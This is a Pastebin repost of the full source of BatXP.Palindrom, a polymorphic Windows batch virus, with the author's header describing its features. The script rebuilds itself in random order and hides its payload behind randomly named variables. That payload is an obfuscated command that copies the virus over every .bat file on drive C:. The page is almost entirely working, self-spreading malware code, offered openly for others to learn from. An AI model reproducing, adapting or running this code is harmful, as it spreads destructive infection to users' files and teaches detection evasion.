FlyFar

Virus.WinXP.Bat.Palindrom.b - Source Code

Jul 3rd, 2023
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 7.31 KB | Cybersecurity | 0 0
  1. @echo off
  2. goto polysta
  3.  
  4. :polysta    %mordnilaP%
  5. ReM Palindrom
  6. ReM ----------- BatXP.Palindom <---> Second Part To Hell[rRlf] -------------------- |Palindrom
  7. ReM                                         |Palindrom
  8. ReM This is BatXP.Palindrom, a polymorph BatXP virus, in it's version 2.0       |Palindrom
  9. ReM It's double polymorph:                              |Palindrom
  10. ReM 1.) It moves the body randomly                          |Palindrom
  11. ReM 2.) It changes the encryption variables                     |Palindrom
  12. ReM I'm sure, that it's the most hightech BatXP virus ever.             |Palindrom
  13. ReM I hope, that you will learn something from the code!                |Palindrom
  14. ReM                                         |Palindrom
  15. ReM *** Information about the virus:                        |Palindrom
  16. ReM VirusName...............BatXP.Palindrom                     |Palindrom
  17. ReM VirusVersion............version 2.0                     |Palindrom
  18. ReM VirusAuthor.............Second Part To Hell[rRlf]               |Palindrom
  19. ReM Infection Way...........It infects every bat-file in every directory        |Palindrom
  20. ReM             at the Drive C:\                    |Palindrom
  21. ReM VirusSize...............7.780 Byte                      |Palindrom
  22. ReM Encrypted...............Yes, but only the Virus-Part                |Palindrom
  23. ReM             It's a "set-encryption".                |Palindrom
  24. ReM Polymorphic.............Yes, two ways:                      |Palindrom
  25. ReM             1.) It moves the body of itself (like BatXP.Saturn) |Palindrom
  26. ReM             2.) It changes the encryption-variable name     |Palindrom
  27. ReM                                         |Palindrom 
  28. ReM Version 2.0 - 30.03.2003:                           |Palindrom
  29. ReM Added the body moving (it was very hard to do)                  |Palindrom
  30. ReM                                         |Palindrom
  31. ReM Version 1.0 - 27.03.2003:                           |Palindrom
  32. ReM Made the virus, encrypt the viruspart and discovered how to change the      |Palindrom
  33. ReM variable names.                                 |Palindrom
  34. ReM                                         |Palindrom
  35. ReM written from 27.03.2003 to 30.03.2003                       |Palindrom
  36. ReM in Austria                                  |Palindrom
  37. ReM ------------------------------------------------------------------------------- |Palindrom
  38. ReM Palindrom
  39. %mordnilaP%set acheck=0
  40. %mordnilaP%set bcheck=0
  41. %mordnilaP%set aaachecker=0
  42. %mordnilaP%set bbbchecker=0
  43. %mordnilaP%set ccchecker=0
  44. %mordnilaP%set dddchecker=0
  45. %mordnilaP%set eeechecker=0
  46. %mordnilaP%set fffchecker=0
  47. %mordnilaP%set gggchecker=0
  48. %mordnilaP%set hhhchecker=0
  49. %mordnilaP%set iiichecker=0
  50. %mordnilaP%set jjjchecker=0
  51. %mordnilaP%set kkkchecker=0
  52. %mordnilaP%set lllchecker=0
  53. %mordnilaP%set mmmchecher=0
  54. %mordnilaP%set nnnchecker=0
  55. %mordnilaP%echo @echo off >checker.bat
  56. %mordnilaP%set crandc=0
  57. :randgen    %mordnilaP%
  58. %mordnilaP%set a=0
  59. %mordnilaP%set counter=0
  60. %mordnilaP%set name=
  61. :stapoly    %mordnilaP%
  62. %mordnilaP%set a=%random%
  63. :polyst     %mordnilaP%
  64. %mordnilaP%if %a% GEQ 50 (set /A a=%a%/3)
  65. %mordnilaP%if %a% LEQ 40 (set /A a=%a%+11)
  66. %mordnilaP%if %a% GEQ 50 (goto polyst)
  67. %mordnilaP%if %a% LSS 41 (goto polyst)
  68. %mordnilaP%set /A a=%a%-40
  69. %mordnilaP%set /A counter=%counter%+1
  70. %mordnilaP%if %a% EQU 1 (set name=%name%P)
  71. %mordnilaP%if %a% EQU 2 (set name=%name%a)
  72. %mordnilaP%if %a% EQU 3 (set name=%name%l)
  73. %mordnilaP%if %a% EQU 4 (set name=%name%i)
  74. %mordnilaP%if %a% EQU 5 (set name=%name%n)
  75. %mordnilaP%if %a% EQU 6 (set name=%name%d)
  76. %mordnilaP%if %a% EQU 7 (set name=%name%r)
  77. %mordnilaP%if %a% EQU 8 (set name=%name%o)
  78. %mordnilaP%if %a% EQU 9 (set name=%name%m)
  79. %mordnilaP%if %counter% LSS 5 goto stapoly
  80. %mordnilaP%set /A crandc=%crandc%+1
  81. %mordnilaP%set name%crandc%=%name%
  82. %mordnilaP%if %crandc% LEQ 13 (goto randgen)
  83. %mordnilaP%goto polystb
  84.  
  85. :polystb        %Palindrom%
  86. %Palindrom%echo @echo off >checker.bat
  87. %Palindrom%echo goto polysta >>checker.bat
  88. :polystbb       %Palindrom%
  89. %Palindrom%set b=%random%
  90. :polystba       %Palindrom%
  91. %Palindrom%set fakewr=P
  92. %Palindrom%if %b% GTR 55 (set /A b=%b%/2)
  93. %Palindrom%if %b% LEQ 40 (set /A b=%b%+15)
  94. %Palindrom%if %b% GTR 55 (goto polystba)
  95. %Palindrom%if %b% LEQ 40 (goto polystba)
  96. %Palindrom%set /A b=%b%-40
  97. %Palindrom%if %b% EQU 1 (if %acheck% NEQ 1 (
  98. %Palindrom%find "mordnila%fakewr%" <%0>>checker.bat
  99. %Palindrom%set acheck=1))
  100. %Palindrom%if %b% EQU 2 (if %aaachecker% NEQ 1 (
  101. %Palindrom%find "%fakewr%aaaa" <%0>>checker.bat
  102. %Palindrom%set aaachecker=1))
  103. %Palindrom%if %b% EQU 3 (if %bbbchecker% NEQ 1 (
  104. %Palindrom%find "%fakewr%bbbb" <%0>>checker.bat
  105. %Palindrom%set bbbchecker=1))
  106. %Palindrom%if %b% EQU 4 (if %ccchecker% NEQ 1 (
  107. %Palindrom%find "%fakewr%cccc" <%0>>checker.bat
  108. %Palindrom%set ccchecker=1))
  109. %Palindrom%if %b% EQU 5 (if %dddchecker% NEQ 1 (
  110. %Palindrom%find "%fakewr%dddd" <%0>>checker.bat
  111. %Palindrom%set dddchecker=1))
  112. %Palindrom%if %b% EQU 6 (if %eeechecker% NEQ 1 (
  113. %Palindrom%find "%fakewr%eeee" <%0>>checker.bat
  114. %Palindrom%set eeechecker=1))
  115. %Palindrom%if %b% EQU 7 (if %fffchecker% NEQ 1 (
  116. %Palindrom%find "%fakewr%ffff" <%0>>checker.bat
  117. %Palindrom%set fffchecker=1))
  118. %Palindrom%if %b% EQU 8 (if %gggchecker% NEQ 1 (
  119. %Palindrom%find "%fakewr%gggg" <%0>>checker.bat
  120. %Palindrom%set gggchecker=1))
  121. %Palindrom%if %b% EQU 9 (if %hhhchecker% NEQ 1 (
  122. %Palindrom%find "%fakewr%hhhh" <%0>>checker.bat
  123. %Palindrom%set hhhchecker=1))
  124. %Palindrom%if %b% EQU 10 (if %iiichecker% NEQ 1 (
  125. %Palindrom%find "%fakewr%iiii" <%0>>checker.bat
  126. %Palindrom%set iiichecker=1))
  127. %Palindrom%if %b% EQU 11 (if %jjjchecker% NEQ 1 (
  128. %Palindrom%find "%fakewr%jjjj" <%0>>checker.bat
  129. %Palindrom%set jjjchecker=1))
  130. %Palindrom%if %b% EQU 12 (if %kkkchecker% NEQ 1 (
  131. %Palindrom%find "%fakewr%kkkk" <%0>>checker.bat
  132. %Palindrom%set kkkchecker=1))
  133. %Palindrom%if %b% EQU 13 (if %lllchecker% NEQ 1 (
  134. %Palindrom%find "%fakewr%llll" <%0>>checker.bat
  135. %Palindrom%set lllchecker=1))
  136. %Palindrom%if %b% EQU 14 (if %bcheck% NEQ 1 (
  137. %Palindrom%find "Palindrom" <%0>>checker.bat
  138. %Palindrom%set bcheck=1))
  139. %Palindrom%if %b% EQU 15 (if %nnnchecker% NEQ 1 (
  140. %Palindrom%find "%fakewr%mmmm" <%0>>checker.bat
  141. %Palindrom%set nnnchecker=1))
  142. %Palindrom%if %acheck% EQU 1 (if %aaachecker% EQU 1 (if %bbbchecker% EQU 1 (if %ccchecker% EQU 1 (
  143. %Palindrom%if %dddchecker% EQU 1 (if %eeechecker% EQU 1 (if %fffchecker% EQU 1 (if %gggchecker% EQU 1 (
  144. %Palindrom%if %hhhchecker% EQU 1 (if %iiichecker% EQU 1 (if %jjjchecker% EQU 1 (if %kkkchecker% EQU 1 (
  145. %Palindrom%if %lllchecker% EQU 1 (if %bcheck% EQU 1 (if %nnnchecker% EQU 1 (
  146. %Palindrom%echo :Pend >>checker.bat
  147. %Palindrom%goto Paaa
  148. %Palindrom%)))))))))))))))
  149. %Palindrom%goto polystbb
  150.  
  151.  
  152.  
  153. :Paaa       %Paaaa%
  154. %Paaaa%echo set %name1%=f>>checker.bat
  155. %Paaaa%goto Pbbb
  156.  
  157. :Pbbb       %Pbbbb%
  158. %Pbbbb%echo set %name2%=o>>checker.bat
  159. %Pbbbb%goto Pccc
  160.  
  161. :Pccc       %Pcccc%
  162. %Pcccc%echo set %name3%=r>>checker.bat
  163. %Pcccc%goto Pddd
  164.  
  165. :Pddd       %Pdddd%
  166. %Pdddd%echo set %name4%=i>>checker.bat
  167. %Pdddd%goto Peee
  168.  
  169. :Peee       %Peeee%
  170. %Peeee%echo set %name5%=n>>checker.bat
  171. %Peeee%goto Pfff
  172.  
  173. :Pfff       %Pffff%
  174. %Pffff%echo set %name6%=b>>checker.bat
  175. %Pffff%goto Pggg
  176.  
  177. :Pggg       %Pgggg%
  178. %Pgggg%echo set %name7%=a>>checker.bat
  179. %Pgggg%goto Phhh
  180.  
  181. :Phhh       %Phhhh%
  182. %Phhhh%echo set %name8%=t>>checker.bat
  183. %Phhhh%goto Piii
  184.  
  185. :Piii       %Piiii%
  186. %Piiii%echo set %name9%=d>>checker.bat
  187. %Piiii%goto Pjjj
  188.  
  189. :Pjjj       %Pjjjj%
  190. %Pjjjj%echo set %name10%=c>>checker.bat
  191. %Pjjjj%goto Pkkk
  192.  
  193. :Pkkk       %Pkkkk%
  194. %Pkkkk%echo set %name11%=p>>checker.bat
  195. %Pkkkk%goto Plll
  196.  
  197. :Plll       %Pllll%
  198. %Pllll%echo set %name12%=y>>checker.bat
  199. %Pllll%goto Pmmm
  200.  
  201. :Pmmm       %Pmmmm%
  202. %Pmmmm%echo %%%name1%%%%%%name2%%%%%%name3%%% /%%%name3%%% C:\ %%%%%%%name3%%% %%%name4%%%%%%name5%%% (*.%%%name6%%%%%%name7%%%%%%name8%%%) %%%name9%%%%%%name2%%% %%%name10%%%%%%name2%%%%%%name11%%%%%%name12%%% %%%name13%%%checker.bat %%%%%%%name3%%% >>checker.bat
  203. %Pmmmm%goto Pend
Tags: batch virus SPTH
Add Comment
Please, Sign In to add comment